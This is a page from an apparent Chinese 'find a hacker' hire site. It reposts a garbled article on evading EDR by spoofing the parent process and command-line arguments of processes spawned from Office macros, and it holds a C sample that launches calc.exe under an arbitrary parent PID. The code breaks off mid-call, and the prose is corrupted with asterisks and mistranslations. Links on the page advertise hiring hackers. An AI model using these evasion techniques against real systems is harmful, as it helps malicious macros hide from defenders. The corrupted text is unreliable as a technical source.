找黑客平台

绕开EDR:结构Office宏欺骗父进程和命令行参数

访客4年前关于黑客接单814

一、情况

大部分当代EDR解决 *** 都应用个人行为检验的 *** ,容许依据其个人行为来检验恶意程序,而不是只是应用IoC(比如:文档hash值、网站域名)。在本文中,我得出了欺骗新进程的父进程和命令行参数这二种技术的VBA完成方式。该类完成容许制做更为隐秘的Office宏,并使宏形成的进程看上去好像由另一个程序流程(比如explorer.exe)建立的,并具备看起来良好的命令行参数。

必须表明的是,我并不是明确提出这种技术的创作者,这种技术是由Will Burgess、Didier Stevens和Casey Smith明确提出的。

更先,大家将解读在Visual Basic中完成的技术情况。我之一次听见这种內容,是在Wild West Hackin’ Fest 2018中听到了Will Burgess的演说以后。

1.1 父进程欺骗

当进程派生出子进程时,比如Sy *** on这类的EDR解决 *** 会纪录该实际操作,另外会纪录各种各样信息,比如:新创建的进程名字、hash值、可实行途径及其相关父进程的信息。这针对预制构件个人行为标准十分有协助,例如,“Microsoft Word始终不容易派生出powershell.exe”。依据我的工作经验,这种标准具备较低的多元性、较高的增加值,仅在非常少状况下能产生乱报。

事实上,在应用Windows当地API建立进程时,能够特定一切进程做为父亲进程。这并并不是一个新鲜事儿,因而我不想在文中中更为详尽地叙述。事实上,Didier Stevens早在十年前就读过有关这一方面的文章内容。下边是一个C 编码的实例供大伙儿参照,将应用随意进程做为父进程,派生出cmd.exe。

// 本编码根据

#include "pch.h"

#include

#include

#include

#include

int main(int argc, char **canttrustthis)

{

PROCESS_INFORMATION pi={ 0 };

STARTUPINFOEXA si={ 0 };

SIZE_T sizeToAllocate;

int parentPid=9524; // Could be found dynamically as well

// Get a handle on the parent process to use

HANDLE processHandle=OpenProcess(PROCESS_ALL_ACCESS, false, parentPid);

if (processHandle==NULL){

fprintf(stderr, "OpenProcess failed");

return 1;

}

// Initialize the process start attributes

InitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);

// Allocate the size needed for the attribute list

si.lpAttributeList=(LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeToAllocate);

InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);

// Set the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS option to specify the parent process to use

if (!UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &processHandle, sizeof(HANDLE), NULL, NULL)){

fprintf(stderr, "UpdateProcThreadAttribute failed");

return 1;

}

si.StartupInfo.cb=sizeof(STARTUPINFOEXA);

printf("Creating process...

");

BOOL success=CreateProcessA(

NULL, // App name

"C:\\\\Windows\\\\system32\\\\calc.exe", // Command line

NULL, // Process attributes

NULL, // Thread attributes

true, // Inherits handles?

EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, // Creation flags

NULL, // Env

"C:\\\\Windows\\\\system32", // Current dir

(LPSTARTUPINFOA) &si,

&pi

标签: 绕过EDR:构造Office宏欺骗父进程和命令行参数
返回列表

上一篇:职场上如何正确提问?掌握关键3点完美应对

下一篇:腾讯面试题:给视频设计一个评分功能?

相关文章

怎么找黑客考证-黑客增长书(成为一个黑客要看什么书)

怎么找黑客考证-黑客增长书(成为一个黑客要看什么书)

怎么找黑客考证相关问题 适合黑客入门的书相关问题 手机被黑客定位监听了 怎么办 世界顶尖名校排行榜(世界十大名校排行榜)...

85咖啡总部电话?拨打加盟电话详细了解加盟

85咖啡总部电话?拨打加盟电话详细了解加盟

咖啡被称为是世界三大饮料之一,而制造咖啡是需要颠末多种措施的,首先要采摘咖啡豆果实,而采摘后的咖啡豆果实还需要加工最后去掉果壳最后酿成咖啡豆,而咖啡豆照旧需要举办烘焙,而举办烘焙后的咖啡豆才会举办研磨...

手机微信号怎么解封账号(微信账号自助解封教程)

手机微信号怎么解封账号(微信账号自助解封教程)

社群运营早已变成新一代营销推广热潮,但为了更好地防止踏入新浪微博过多商业化的的缺点,手机微信在“私域流量”一明确提出来,就下手治理微信朋友圈品质,听说半小时封了三千万微信推广号,不难看出惩处的幅度...

黑客加盟(专业黑客雇佣平台)

黑客加盟(专业黑客雇佣平台)

本文导读目录: 1、中国有那些出名的黑客? 2、当遇到加盟骗局该如何投诉? 3、黑客具体都有那些招数啊 4、加盟顺丰黑客赚钱吗有谁知道 5、智能安防有没有市场,能加盟么 中国有那些出...

但是如果你在手机和电脑同时登录就可以

微信朋友圈怎么看访客记录,朋友圈访客记录查询2020-12-17 微信朋友圈目前是没办法看访客的,只能通过第三方小程序或网站的一些方法来查看,需要在朋友...

《特种兵归来4-替身疑云》定档2月4日 一起揭开“

今日,由侯杰导演倾力执导,知名军文作家魏笑宇担任编剧的动作剧情电影《特种兵归来4-替身疑云》发布高燃物料,正式定档2月4日于腾讯视频独家全网上线。据悉该片由《特种兵归来》系...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.